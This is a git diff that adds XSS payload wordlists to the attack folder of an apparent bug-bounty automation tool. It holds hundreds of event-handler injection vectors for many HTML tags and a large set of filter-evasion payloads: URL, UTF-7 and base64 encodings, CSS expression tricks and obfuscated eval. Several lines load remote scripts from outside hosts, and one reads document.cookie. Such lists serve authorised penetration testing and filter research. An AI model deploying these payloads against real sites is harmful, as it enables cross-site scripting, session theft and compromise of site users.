+<u id=x tabindex=1 onbeforeactivate=alert(1)></u> +<u id=x tabindex=1 onbeforedeactivate=alert(1)></u><input autofocus> +<u id=x tabindex=1 ondeactivate=alert(1)></u><input id=y autofocus> +<u id=x tabindex=1 onfocus=alert(1)></u> +<u id=x tabindex=1 onfocusin=alert(1)></u> +<u onbeforecopy="alert(1)" contenteditable>test</u> +<u onbeforecut="alert(1)" contenteditable>test</u> +<u onbeforepaste="alert(1)" contenteditable>test</u> +<u onblur=alert(1) tabindex=1 id=x></u><input autofocus> +<u onclick="alert(1)">test</u> +<u oncontextmenu="alert(1)">test</u> +<u oncopy="alert(1)" contenteditable>test</u> +<u oncut="alert(1)" contenteditable>test</u> +<u ondblclick="alert(1)">test</u> +<u onfocusout=alert(1) tabindex=1 id=x></u><input autofocus> +<u onkeydown="alert(1)" contenteditable>test</u> +<u onkeypress="alert(1)" contenteditable>test</u> +<u onkeyup="alert(1)" contenteditable>test</u> +<u onmousedown="alert(1)">test</u> +<u onmouseenter="alert(1)">test</u> +<u onmouseleave="alert(1)">test</u> +<u onmousemove="alert(1)">test</u> +<u onmouseout="alert(1)">test</u> +<u onmouseover="alert(1)">test</u> +<u onmouseup="alert(1)">test</u> +<u onpaste="alert(1)" contenteditable>test</u> +<ul draggable="true" ondrag="alert(1)">test</ul> +<ul draggable="true" ondragend="alert(1)">test</ul> +<ul draggable="true" ondragenter="alert(1)">test</ul> +<ul draggable="true" ondragleave="alert(1)">test</ul> +<ul draggable="true" ondragstart="alert(1)">test</ul> +<ul id=x tabindex=1 onactivate=alert(1)></ul> +<ul id=x tabindex=1 onbeforeactivate=alert(1)></ul> +<ul id=x tabindex=1 onbeforedeactivate=alert(1)></ul><input autofocus> +<ul id=x tabindex=1 ondeactivate=alert(1)></ul><input id=y autofocus> +<ul id=x tabindex=1 onfocus=alert(1)></ul> +<ul id=x tabindex=1 onfocusin=alert(1)></ul> +<ul onbeforecopy="alert(1)" contenteditable>test</ul> +<ul onbeforecut="alert(1)" contenteditable>test</ul> +<ul onbeforepaste="alert(1)" contenteditable>test</ul> +<ul onblur=alert(1) tabindex=1 id=x></ul><input autofocus> +<ul onclick="alert(1)">test</ul> +<ul oncontextmenu="alert(1)">test</ul> +<ul oncopy="alert(1)" contenteditable>test</ul> +<ul oncut="alert(1)" contenteditable>test</ul> +<ul ondblclick="alert(1)">test</ul> +<ul onfocusout=alert(1) tabindex=1 id=x></ul><input autofocus> +<ul onkeydown="alert(1)" contenteditable>test</ul> +<ul onkeypress="alert(1)" contenteditable>test</ul> +<ul onkeyup="alert(1)" contenteditable>test</ul> +<ul onmousedown="alert(1)">test</ul> +<ul onmouseenter="alert(1)">test</ul> +<ul onmouseleave="alert(1)">test</ul> +<ul onmousemove="alert(1)">test</ul> +<ul onmouseout="alert(1)">test</ul> +<ul onmouseover="alert(1)">test</ul> +<ul onmouseup="alert(1)">test</ul> +<ul onpaste="alert(1)" contenteditable>test</ul> +<var draggable="true" ondrag="alert(1)">test</var> +<var draggable="true" ondragend="alert(1)">test</var> +<var draggable="true" ondragenter="alert(1)">test</var> +<var draggable="true" ondragleave="alert(1)">test</var> +<var draggable="true" ondragstart="alert(1)">test</var> +<var id=x tabindex=1 onactivate=alert(1)></var> +<var id=x tabindex=1 onbeforeactivate=alert(1)></var> +<var id=x tabindex=1 onbeforedeactivate=alert(1)></var><input autofocus> +<var id=x tabindex=1 ondeactivate=alert(1)></var><input id=y autofocus> +<var id=x tabindex=1 onfocus=alert(1)></var> +<var id=x tabindex=1 onfocusin=alert(1)></var> +<var onbeforecopy="alert(1)" contenteditable>test</var> +<var onbeforecut="alert(1)" contenteditable>test</var> +<var onbeforepaste="alert(1)" contenteditable>test</var> +<var onblur=alert(1) tabindex=1 id=x></var><input autofocus> +<var onclick="alert(1)">test</var> +<var oncontextmenu="alert(1)">test</var> +<var oncopy="alert(1)" contenteditable>test</var> +<var oncut="alert(1)" contenteditable>test</var> +<var ondblclick="alert(1)">test</var> +<var onfocusout=alert(1) tabindex=1 id=x></var><input autofocus> +<var onkeydown="alert(1)" contenteditable>test</var> +<var onkeypress="alert(1)" contenteditable>test</var> +<var onkeyup="alert(1)" contenteditable>test</var> +<var onmousedown="alert(1)">test</var> +<var onmouseenter="alert(1)">test</var> +<var onmouseleave="alert(1)">test</var> +<var onmousemove="alert(1)">test</var> +<var onmouseout="alert(1)">test</var> +<var onmouseover="alert(1)">test</var> +<var onmouseup="alert(1)">test</var> +<var onpaste="alert(1)" contenteditable>test</var> +<video autoplay controls onpause=alert(1)><source src="validvideo.mp4" type="video/mp4"></video> +<video autoplay controls onseeked=alert(1)><source src="validvideo.mp4" type="video/mp4"></video> +<video autoplay controls onseeking=alert(1)><source src="validvideo.mp4" type="video/mp4"></video> +<video autoplay controls onvolumechange=alert(1)><source src="validvideo.mp4" type="video/mp4"></video> +<video autoplay controls onwaiting=alert(1)><source src="validvideo.mp4" type=video/mp4></video> +<video autoplay onloadedmetadata=alert(1)> <source src="validvideo.mp4" type="video/mp4"></video> +<video autoplay onplay=alert(1)><source src="validvideo.mp4" type="video/mp4"></video> +<video autoplay onplaying=alert(1)><source src="validvideo.mp4" type="video/mp4"></video> +<video controls autoplay onended=alert(1)><source src="validvideo.mp4" type="video/mp4"></video> +<video controls autoplay ontimeupdate=alert(1)><source src="validvideo.mp4" type="video/mp4"></video> +<video draggable="true" ondrag="alert(1)">test</video> +<video draggable="true" ondragend="alert(1)">test</video> +<video draggable="true" ondragenter="alert(1)">test</video> +<video draggable="true" ondragleave="alert(1)">test</video> +<video draggable="true" ondragstart="alert(1)">test</video> +<video id=x controls onfocus=alert(1)><source src="validvideo.mp4" type=video/mp4></video> +<video id=x controls onfocusin=alert(1)><source src="validvideo.mp4" type=video/mp4></video> +<video id=x tabindex=1 onactivate=alert(1)></video> +<video id=x tabindex=1 onbeforeactivate=alert(1)></video> +<video id=x tabindex=1 onbeforedeactivate=alert(1)></video><input autofocus> +<video id=x tabindex=1 ondeactivate=alert(1)></video><input id=y autofocus> +<video onbeforecopy="alert(1)" contenteditable>test</video> +<video onbeforecut="alert(1)" contenteditable>test</video> +<video onbeforepaste="alert(1)" contenteditable>test</video> +<video onblur=alert(1) tabindex=1 id=x></video><input autofocus> +<video oncanplay=alert(1)><source src="validvideo.mp4" type="video/mp4"></video> +<video oncanplaythrough=alert(1)><source src="validvideo.mp4" type="video/mp4"></video> +<video onclick="alert(1)">test</video> +<video oncontextmenu="alert(1)">test</video> +<video oncopy="alert(1)" contenteditable>test</video> +<video oncut="alert(1)" contenteditable>test</video> +<video ondblclick="alert(1)">test</video> +<video onfocusout=alert(1) tabindex=1 id=x></video><input autofocus> +<video onkeydown="alert(1)" contenteditable>test</video> +<video onkeypress="alert(1)" contenteditable>test</video> +<video onkeyup="alert(1)" contenteditable>test</video> +<video onloadeddata=alert(1)><source src="validvideo.mp4" type="video/mp4"></video> +<video onmousedown="alert(1)">test</video> +<video onmouseenter="alert(1)">test</video> +<video onmouseleave="alert(1)">test</video> +<video onmousemove="alert(1)">test</video> +<video onmouseout="alert(1)">test</video> +<video onmouseover="alert(1)">test</video> +<video onmouseup="alert(1)">test</video> +<video onpaste="alert(1)" contenteditable>test</video> +<video src/onerror=alert(1)> +<video><source onerror=alert(1) src=1></video> +<video><track default onload=alert(1) src="data:text/vtt,WEBVTT"></video> +<wbr draggable="true" ondrag="alert(1)">test</wbr> +<wbr draggable="true" ondragend="alert(1)">test</wbr> +<wbr draggable="true" ondragenter="alert(1)">test</wbr> +<wbr draggable="true" ondragleave="alert(1)">test</wbr> +<wbr draggable="true" ondragstart="alert(1)">test</wbr> +<wbr id=x tabindex=1 onactivate=alert(1)></wbr> +<wbr id=x tabindex=1 onbeforeactivate=alert(1)></wbr> +<wbr id=x tabindex=1 onbeforedeactivate=alert(1)></wbr><input autofocus> +<wbr id=x tabindex=1 ondeactivate=alert(1)></wbr><input id=y autofocus> +<wbr id=x tabindex=1 onfocus=alert(1)></wbr> +<wbr id=x tabindex=1 onfocusin=alert(1)></wbr> +<wbr onbeforecopy="alert(1)" contenteditable>test</wbr> +<wbr onbeforecut="alert(1)" contenteditable>test</wbr> +<wbr onbeforepaste="alert(1)" contenteditable>test</wbr> +<wbr onblur=alert(1) tabindex=1 id=x></wbr><input autofocus> +<wbr onclick="alert(1)">test</wbr> +<wbr oncontextmenu="alert(1)">test</wbr> +<wbr oncopy="alert(1)" contenteditable>test</wbr> +<wbr oncut="alert(1)" contenteditable>test</wbr> +<wbr ondblclick="alert(1)">test</wbr> +<wbr onfocusout=alert(1) tabindex=1 id=x></wbr><input autofocus> +<wbr onkeydown="alert(1)" contenteditable>test</wbr> +<wbr onkeypress="alert(1)" contenteditable>test</wbr> +<wbr onkeyup="alert(1)" contenteditable>test</wbr> +<wbr onmousedown="alert(1)">test</wbr> +<wbr onmouseenter="alert(1)">test</wbr> +<wbr onmouseleave="alert(1)">test</wbr> +<wbr onmousemove="alert(1)">test</wbr> +<wbr onmouseout="alert(1)">test</wbr> +<wbr onmouseover="alert(1)">test</wbr> +<wbr onmouseup="alert(1)">test</wbr> +<wbr onpaste="alert(1)" contenteditable>test</wbr> +<xmp draggable="true" ondrag="alert(1)">test</xmp> +<xmp draggable="true" ondragend="alert(1)">test</xmp> +<xmp draggable="true" ondragenter="alert(1)">test</xmp> +<xmp draggable="true" ondragleave="alert(1)">test</xmp> +<xmp draggable="true" ondragstart="alert(1)">test</xmp> +<xmp id=x tabindex=1 onactivate=alert(1)></xmp> +<xmp id=x tabindex=1 onbeforeactivate=alert(1)></xmp> +<xmp id=x tabindex=1 onbeforedeactivate=alert(1)></xmp><input autofocus> +<xmp id=x tabindex=1 ondeactivate=alert(1)></xmp><input id=y autofocus> +<xmp id=x tabindex=1 onfocus=alert(1)></xmp> +<xmp id=x tabindex=1 onfocusin=alert(1)></xmp> +<xmp onbeforecopy="alert(1)" contenteditable>test</xmp> +<xmp onbeforecut="alert(1)" contenteditable>test</xmp> +<xmp onbeforepaste="alert(1)" contenteditable>test</xmp> +<xmp onblur=alert(1) tabindex=1 id=x></xmp><input autofocus> +<xmp onclick="alert(1)">test</xmp> +<xmp oncontextmenu="alert(1)">test</xmp> +<xmp oncopy="alert(1)" contenteditable>test</xmp> +<xmp oncut="alert(1)" contenteditable>test</xmp> +<xmp ondblclick="alert(1)">test</xmp> +<xmp onfocusout=alert(1) tabindex=1 id=x></xmp><input autofocus> +<xmp onkeydown="alert(1)" contenteditable>test</xmp> +<xmp onkeypress="alert(1)" contenteditable>test</xmp> +<xmp onkeyup="alert(1)" contenteditable>test</xmp> +<xmp onmousedown="alert(1)">test</xmp> +<xmp onmouseenter="alert(1)">test</xmp> +<xmp onmouseleave="alert(1)">test</xmp> +<xmp onmousemove="alert(1)">test</xmp> +<xmp onmouseout="alert(1)">test</xmp> +<xmp onmouseover="alert(1)">test</xmp> +<xmp onmouseup="alert(1)">test</xmp> +<xmp onpaste="alert(1)" contenteditable>test</xmp> +<xss id=x tabindex=1 onactivate=alert(1)></xss> +<xss id=x tabindex=1 onbeforeactivate=alert(1)></xss> +<xss id=x tabindex=1 onbeforedeactivate=alert(1)></xss><input autofocus> +<xss id=x tabindex=1 onblur=alert(1)></xss><input autofocus> +<xss id=x tabindex=1 ondeactivate=alert(1)></xss><input autofocus> +<xss id=x tabindex=1 onfocus=alert(1)></xss> +<xss id=x tabindex=1 onfocusin=alert(1)></xss> +<xss id=x tabindex=1 onfocusout=alert(1)></xss><input autofocus> \ No newline at end of file diff --git a/bounty_drive/attacks/xss/payloads/XSS-EnDe-evation.txt b/bounty_drive/attacks/xss/payloads/XSS-EnDe-evation.txt new file mode 100644 index 0000000..6411021 --- /dev/null +++ b/bounty_drive/attacks/xss/payloads/XSS-EnDe-evation.txt @@ -0,0 +1,164 @@ +"'`ʼˈ‘’‚‛“”„‟′″‴‵‶‷﹅﹐"',舧艠︐︑--><script>alert(42)</script> +"'><script>alert('XSS')</script> +"'><script>alert(/XSS/)</script> +"'><script>alert(42)</script> +"'><script>prompt(42)</script> +"'><script>confirm(42)</script> +"'><sCriPt>confirm(42)</sCriPt> +"'><script >confirm(42)</script > +"'><script foo=bar>confirm(42)</script> +"'><\script>confirm(42)</script> +"'><sc\ript>confirm(42)</script> +"'><sc\tript>confirm(42)</script> +"'><script onlyOpera:-)>alert(42) +"'><script /*%00*/>/*%00*/alert(42)/*%00*/</script /*%00*/ +"'><script x:href='//evil.com/onlyOpera'> +"'><///script///>alert(42)</script> +"'><///style///>alert(42)</script> +"'><;(24)trela=daolno ;''=e>'=d +"'><;(24)trela=daolno ;''=/e>'=d +"'><isindex action="javas&Tab;cript:alert(42)" type=image> +"'><sc ript>confirm(42)</script> +"'%3e%3cscript%3econfirm(42)%3c/script%3e +"'%253e%253cscript%253econfirm(42)%253c/script%253e +"'%25253e%25253cscript%25253econfirm(42)%25253c/script%25253e +"'%u3e%u3cscript%u3econfirm(42)%u3c/script%u3e +"'%u003e%u003cscript%u003econfirm(42)%u003c/script%u003e +"'%25u003e%25u003cscript%25u003econfirm(42)%25u003c/script%25u003e +%22%27%3e%3cscript%3econfirm(42)%3c/script%3e +%u22%u27%u3e%u3cscript%u3econfirm(42)%u3c/script%u3e +%u0022%u0027%u003e%u003cscript%u003econfirm(42)%u003c/script%u003e +%2522%2527%253e%253cscript%253econfirm(42)%253c/script%253e +%252522%252527%25253e%25253cscript%25253econfirm(42)%25253c/script%25253e +%25u22%25u27%25u3e%25u3cscript%25u3econfirm(42)%25u3c/script%25u3e +%25u0022%25u0027%25u003e%25u003cscript%25u003econfirm(42)%25u003c/script%25u003e +"'><script>\u0061lert(42)</script> +"'ܾܼscriptܾalert(42)ܼܯscriptܾ +"'%07%3e%07%3cscript%07%3ealert(42)%07%3c/script%07%3e +"'%u073e%u073cscript%u073ealert(42)%u073c/script%u073e +%07%22%07%27%07%3e%07%3cscript%07%3ealert(42)%07%3c/script%07%3e +%u0722%u0727%u073e%u073cscript%u073ealert(42)%u073c/script%u073e +"'%2507%253e%2507%253cscript%2507%253ealert(42)%2507%253c/script%2507%253e +"'%25u073e%25u073cscript%25u073ealert(42)%25u073c/script%25u073e +%2507%2522%2507%2527%2507%253e%2507%253cscript%2507%253ealert(42)%2507%253c/script%2507%253e +%25u0722%25u0727%25u073e%25u073cscript%25u073ealert(42)%25u073c/script%25u073e +javascript:alert(42) +javascript:prompt(42) +javascript:confirm(42) +jAvasCript:confirm(42) +jAvas\Cript:confirm(42) +jAvas Cript:confirm(42) +jAvas/* */Cript:confirm(42) + javascript:alert(42) +document +document. +top +top. +top[ +eval +eval( +cookie +.cookie +onerror +onerror= +onclick +onclick= +onmouseover +onmouseover= +onload +onload= +"onerror +"onerror= +"onclick +"onclick= +"onmouseover +"onmouseover= +"onload +"onload= +href= +src= +link= +style= +alt= +title= +egal= +"href= +"src= +"link= +"style= +"alt= +"title= +"egal= +<a +<a href= +<a alt=42 href= +<a href="javascript: +<a href=" javascript: +<p +<div +<iframe +<index +<layer +<link +<meta +<style +<script +<img src="/" =_=" title="onerror='alert(42)'"> +<img src ?notinChrome?\/onerror = alert(42) +<img src ?notinChrome?\/onerror=alert(42) +<img/alt="/"src="/"onerror=alert(42)> +<iframe/src \/\/onload = alert(42) +<iframe/onreadystatechange=alert(42) +<!-- open comment +<!-- complete comment --> +--><!-- close/complete comment --> +<![CDATA[ +<![CDATA[ open cdata +<![CDATA[ complete cdata ]]> +]]><![CDATA[ close/complete cdata ]]> +<?xml +<?xml version="1.0"> +" value=`` +onmouseover=\u0061\u006C\u0065\u0072\u0074('XSS') +onmouseover=\uFF41\uFF4C\uFF45\uFF52\uFF54\u1455\uFF14\uFF12\u1450 +<div style="{ left:expression( alert('XSS') ) }"> +left:expr/**/ession(alert('XSS')) +left:expr/* */ession(alert('XSS')) +left:e\0078pr\0065ssion(alert('XSS')) +left:\0065\0078pr\0065ssion(alert('XSS')) +left:expr\65ssion(alert('XSS') )) +left:expr\0065ssion(alert('XSS')) +left:expr&#x65;ssion(alert('XSS')) +left:expr&#101;ssion(alert('XSS')) +left:expr&#x0065;ssion(alert('XSS')) +left:\ff45\ff58\ff50\ff52\ff45\ff53\ff53\ff49\ff4f\ff4e(alert('XSS')) +left:&#xff45;&#xff58;&#xff50;&#xff52;&#xff45;&#xff53;&#xff53;&#xff49;&#xff4f;&#xff4e;(alert('XSS')) +left:\uFF41\uFF4C\uFF45\uFF52\uFF54\u1455\uFF14\uFF12\u1450 +left:expression(alert('XSS')) +left:EXPR/**/ESSION(alert('XSS')) +left:EXPR/* */ESSION(alert('XSS')) +left:\ff25\ff38\ff30\ff32\ff42\ff53\ff33\ff29\ff2f\ff2e(alert('XSS')) +left:&#xff25;&#xff38;&#xff30;&#xff32;&#xff42;&#xff53;&#xff33;&#xff29;&#xff2f;&#xff2e;(alert('XSS')) +left:EXPRESSION(alert('XSS')) +left:exp\0280essio\0274(alert('XSS')) +left:exp\0280essio\207f(alert('XSS')) +left:expʀessioɴ(alert('XSS')) +left:expʀessioⁿ(alert('XSS')) +%u00ABscript%u00BB +&#x3008;script&#x3009; +U%2bFF1CscriptU%2bFF1E +&#x2039;script&#x203A; +&#x2329;script&#x232A; +&#x27E8;script&#x27E9; +href="data:text/html;charset=utf-8,%3cscript%3econfirm(42);%3c/script%3e" UTF-8 URL-encoded +href="data:text/html;charset=utf-8,%3c%73%63%72%69%70%74%3e%63%6f%6e%66%69%72%6d%28%34%32%29%3b%3c%2f%73%63%72%69%70%74%3e" UTF-8 URL-encoded (all) +href="data:text/html;base64,PHNjcmlwdD5jb25maXJtKDQyKTs8L3NjcmlwdD4=" base64 +href="data:text/html;charset=utf-7,+ADw-script+AD4-confirm(42)+ADsAPA-/script+AD4-" UTF-7 +href="data:text/html;charset=utf-7,+ADwAcwBjAHIAaQBwAHQAPgBhAGwAZQByAHQAKAAxACkAOwBoAGkAcwB0AG8AcgB5AC4AYgBhAGMAawAoACkAOwA8AC8AcwBjAHIAaQBwAHQAPgAKADwAcwBjAHIAaQBwAHQAPgBjAG8AbgBmAGkAcgBtACgANAAyACkAOwA8AC8AcwBjAHIAaQBwAHQAPg-" UTF-7 (all) +href="data:text/html;charset=utf-7,+ADwAcwBjAHIAaQBwAHQAPg-confirm(42)+ADsAPA-/script+AD4-" UTF-7/UTF-8 mix +href="data:text/html;charset=utf-7;base64,K0FEdy1zY3JpcHQrQUQ0LWNvbmZpcm0oNDIpK0FEc0FQQS0vc2NyaXB0K0FENC0=" UTF-7 in base64 +href="data: text/html;charset=utf-7;base64,K0FEdy1zY3JpcHQrQUQ0LWNvbmZpcm0oNDIpK0FEc0FQQS0vc2NyaXB0K0FENC0=">obfuscated UTF-7 in base64 +href="data:text/html;base64;charset=utf-7,+AFAASABOAGoAYwBtAGwAdwBkAEQANQBqAGIAMgA1AG0AYQBYAEoAdABLAEQAUQB5AEsAVABzADgATAAzAE4AagBjAG0AbAB3AGQARAA0AD0-" base64 in UTF-7 +%22onmouseover%3d'alert(/PHP_SELF/)'%3d%22%3e +%20%22onmouseover%3d'alert(/PHP_SELF/)'%3d%22%3e +<%<!--'%><script>alert(42);</script --> \ No newline at end of file diff --git a/bounty_drive/attacks/xss/payloads/XSS-EnDe-h4k.txt b/bounty_drive/attacks/xss/payloads/XSS-EnDe-h4k.txt new file mode 100644 index 0000000..e78a94c --- /dev/null +++ b/bounty_drive/attacks/xss/payloads/XSS-EnDe-h4k.txt @@ -0,0 +1,206 @@ +onclick=eval/**/(/ale/.source%2b/rt/.source%2b/(7)/.source); +<s>000<s>%3cs%3e111%3c/s%3e%3c%73%3e%32%32%32%3c%2f%73%3e&#60&#115&#62&#51&#51&#51&#60&#47&#115&#62&#x3c&#x73&#x3e&#x34&#x34&#x34&#x3c&#x2f&#x73&#x3e +';alert(0)//\';alert(1)//";alert(2)//\";alert(3)//--></SCRIPT>">'><SCRIPT>alert(4)</SCRIPT>=&{}");}alert(6);function xss(){// +';alert(0)//\';alert(1)//";alert(2)//\";alert(3)//--></SCRIPT>">'></title><SCRIPT>alert(4)</SCRIPT>=&{</title><script>alert(5)</script>}");} +aim: &c:\windows\system32\calc.exe" ini="C:\Documents and Settings\All Users\Start Menu\Programs\Startup\pwnd.bat" +<div/style=\-\mo\z\-b\i\nd\in\g:\url(//business\i\nfo.co.uk\/labs\/xbl\/xbl\.xml\#xss)> +<div/style=&#92&#45&#92&#109&#111&#92&#122&#92&#45&#98&#92&#105&#92&#110&#100&#92&#105&#110&#92&#103:&#92&#117&#114&#108&#40&#47&#47&#98&#117&#115&#105&#110&#101&#115&#115&#92&#105&#92&#110&#102&#111&#46&#99&#111&#46&#117&#107&#92&#47&#108&#97&#98&#115&#92&#47&#120&#98&#108&#92&#47&#120&#98&#108&#92&#46&#120&#109&#108&#92&#35&#120&#115&#115&#41&> +<div&nbsp;style=\-\mo\z\-b\i\nd\in\g:\url(//business\i\nfo.co.uk\/labs\/xbl\/xbl\.xml\#xss)> +<div&nbsp &nbsp style=\-\mo\z\-b\i\nd\in\g:\url(//business\i\nfo.co.uk\/labs\/xbl\/xbl\.xml\#xss)> +<x/style=-m\0o\0z\0-b\0i\0nd\0i\0n\0g\0:\0u\0r\0l\0(\0/\0/b\0u\0s\0i\0ne\0s\0s\0i\0nf\0o\0.c\0o\0.\0u\0k\0/\0la\0b\0s\0/\0x\0b\0l\0/\0x\0b\0l\0.\0x\0m\0l\0#\0x\0s\0s\0)> +<BASE HREF="javascript:alert('XSS');//"> +`> <script>alert(5)</script> +> <script>alert(4)</script> +xyz onerror=alert(6); +1;a=eval;b=alert;a(b(/c/.source)); +1];a=eval;b=alert;a(b(17));// +];a=eval;b=alert;a(b(16));// +'];a=eval;b=alert;a(b(15));// +1};a=eval;b=alert;a(b(14));// +'};a=eval;b=alert;a(b(13));// +};a=eval;b=alert;a(b(12));// +a=1;a=eval;b=alert;a(b(11));// +;//%0da=eval;b=alert;a(b(10));// +';//%0da=eval;b=alert;a(b(9));// +'> <script>alert(3)</script> +</title><script>alert(1)</script> +<BGSOUND SRC="javascript:alert('XSS');"> +<BODY BACKGROUND="javascript:alert('XSS');"> +<BODY ONLOAD=alert('XSS')> +<!--<A href="- --><a href=javascript:alert:document.domain>test--> +<IMG SRC=JaVaScRiPt:alert('XSS')> +<%3C&lt&lt;&LT&LT;&#60&#060&#0060&#00060&#000060&#0000060&#60;&#060;&#0060;&#00060;&#000060;&#0000060;&#x3c&#x03c&#x003c&#x0003c&#x00003c&#x000003c&#x3c;&#x03c;&#x003c;&#x0003c;&#x00003c;&#x000003c;&#X3c&#X03c&#X003c&#X0003c&#X00003c&#X000003c&#X3c;&#X03c;&#X003c;&#X0003c;&#X00003c;&#X000003c;&#x3C&#x03C&#x003C&#x0003C&#x00003C&#x000003C&#x3C;&#x03C;&#x003C;&#x0003C;&#x00003C;&#x000003C;&#X3C&#X03C&#X003C&#X0003C&#X00003C&#X000003C&#X3C;&#X03C;&#X003C;&#X0003C;&#X00003C;&#X000003C;\x3c\x3C\u003c\u003C +<script>var a = "</script> <script> alert('XSS !'); </script> <script>";</script> +<!--[if gte IE 4]><SCRIPT>alert('XSS');</SCRIPT><![endif]--> +*/a=eval;b=alert;a(b(/e/.source));/* +width: expression((window.r==document.cookie)?'':alert(r=document.cookie)) +<A HREF="http://www.gohttp://www.google.com/ogle.com/">XSS</A> +<META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert('XSS')</SCRIPT>"> +<DIV STYLE="background-image: url(javascript:alert('XSS'))"> +<DIV STYLE="background-image: url(&#1;javascript:alert('XSS'))"> +<DIV STYLE="width: expression(alert('XSS'));"> +<DIV STYLE="background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029"> +<IFRAME SRC=http://ha.ckers.org/scriptlet.html < +<A HREF="http://1113982867/">XSS</A> +<EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED> +<IMG SRC="jav&#x0D;ascript:alert('XSS');"> +<IMG SRC="jav&#x09;ascript:alert('XSS');"> +<IMG SRC="jav&#x0A;ascript:alert('XSS');"> +<IMG SRC="javascript:alert('XSS');"> +</TITLE><SCRIPT>alert("XSS");</SCRIPT> +\";alert('XSS');// +<SCRIPT a=">" SRC="http://ha.ckers.org/xss.js"></SCRIPT> +<SCRIPT ="blah" SRC="http://ha.ckers.org/xss.js"></SCRIPT> +<SCRIPT a="blah" '' SRC="http://ha.ckers.org/xss.js"></SCRIPT> +<SCRIPT "a='>'" SRC="http://ha.ckers.org/xss.js"></SCRIPT> +<SCRIPT a=`>` SRC="http://ha.ckers.org/xss.js"></SCRIPT> +eval(name) +<A HREF="http://www.google.com./">XSS</A> +<<SCRIPT>alert("XSS");//<</SCRIPT> +<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://ha.ckers.org/xss.js"></SCRIPT> +<SCRIPT a=">'>" SRC="http://ha.ckers.org/xss.js"></SCRIPT> +<A HREF="//google">XSS</A> +<A HREF="http://ha.ckers.org@google">XSS</A> +<A HREF="http://google:ha.ckers.org">XSS</A> +firefoxurl:test|"%20-new-window%20javascript:alert(\'Cross%2520Browser%2520Scripting!\');" +<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET> +<IMG SRC=`javascript:alert("RSnake says### 'XSS'")`> +<IMG SRC="javascript:alert('XSS')" +<A HREF="http://0x42.0x0000066.0x7.0x93/">XSS</A> +<IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29> +<IMG SRC=javascript:alert(&quot;XSS&quot;)> +'';!--"<script>alert(0);</script>=&{(alert(1))} +<?xml version="1.0"?><html:html xmlns:html='http://www.w3.org/1999/xhtml'><html:script>alert(document.cookie);</html:script></html:html> +<img src=`x` onrerror= ` ;; alert(1) ` /> +</a style=""xx:expr/**/ession(document.appendChild(document.createElement('script')).src='http://h4k.in/i.js')"> + style=color: expression(alert(0));" a=" +vbscript:Execute(MsgBox(chr(88)&chr(83)&chr(83)))< +<IFRAME SRC="javascript:alert('XSS');"></IFRAME> +a=<a><b>%3c%69%6d%67%2f%73%72%63%3d%31%20%6f%6e%65%72%72%6f%72%3d%61%6c%65%72%74%28%31%29%3e</b></a>document.write(unescape(a..b)) +<IMG SRC="jav&#x09;ascript:alert(<WBR>'XSS');"> +<IMG SRC="jav&#x0A;ascript:alert(<WBR>'XSS');"> +<IMG SRC="jav&#x0D;ascript:alert(<WBR>'XSS');"> +<IMG SRC=javascript:alert(String.fromCharCode(88###83###83))> +<IMG DYNSRC="javascript:alert('XSS');"> +<IMG SRC="http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode"> +Redirect 302 /a.jpg http://victimsite.com/admin.asp&deleteuser +<IMG LOWSRC="javascript:alert('XSS');"> +<IMG SRC=javascript:alert('XSS')> +exp/*<XSS STYLE='no\xss:noxss("*//*");xss:&#101;x&#x2F;*XSS*//*/*/pression(alert("XSS"))'> +<IMG SRC="javascript:alert('XSS');"> +<IMG SRC='vbscript:msgbox("XSS")'> +<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');"> +<A HREF="http://66.102.7.147/">XSS</A> +s1=''+'java'+''+'scr'+'';s2=''+'ipt'+':'+'ale'+'';s3=''+'rt'+''+'(1)'+''; u1=s1+s2+s3;URL=u1 +s1=0?'1':'i'; s2=0?'1':'fr'; s3=0?'1':'ame'; i1=s1+s2+s3; s1=0?'1':'jav'; s2=0?'1':'ascr'; s3=0?'1':'ipt'; s4=0?'1':':'; s5=0?'1':'ale'; s6=0?'1':'rt'; s7=0?'1':'(1)'; i2=s1+s2+s3+s4+s5+s6+s7; +s1=0?'':'i';s2=0?'':'fr';s3=0?'':'ame';i1=s1+s2+s3;s1=0?'':'jav';s2=0?'':'ascr';s3=0?'':'ipt';s4=0?'':':';s5=0?'':'ale';s6=0?'':'rt';s7=0?'':'(1)';i2=s1+s2+s3+s4+s5+s6+s7;i=createElement(i1);i.src=i2;x=parentNode;x.appendChild(i); +s1=['java'+''+''+'scr'+'ipt'+':'+'aler'+'t'+'(1)']; +s1=['java'||''+'']; s2=['scri'||''+'']; s3=['pt'||''+'']; +s1=!''&&'jav';s2=!''&&'ascript';s3=!''&&':';s4=!''&&'aler';s5=!''&&'t';s6=!''&&'(1)';s7=s1+s2+s3+s4+s5+s6;URL=s7; +s1='java'||''+'';s2='scri'||''+'';s3='pt'||''+''; +<BR SIZE="&{alert('XSS')}"> +<A HREF="javascript:document.location='http://www.google.com/'">XSS</A> +%0da=eval;b=alert;a(b(/d/.source)); +<a href = "javas cript :ale rt(1)">test ++alert(0)+ +<body onload=;a2={y:eval};a1={x:a2.y('al'+'ert')};;;;;;;;;_=a1.x;_(1);;;; +<body onload=a1={x:this.parent.document};a1.x.writeln(1);> +<body onload=;a1={x:document};;;;;;;;;_=a1.x;_.write(1);;;; +<LAYER SRC="http://ha.ckers.org/scriptlet.html"></LAYER> +<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS +<IMG SRC="livescript:[code]"> +<XSS STYLE="behavior: url(http://ha.ckers.org/xss.htc);"> +<IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041> +<IMG """><SCRIPT>alert("XSS")</SCRIPT>"> +%26%2339);x=alert;x(%26%2340 /finally through!/.source %26%2341);// 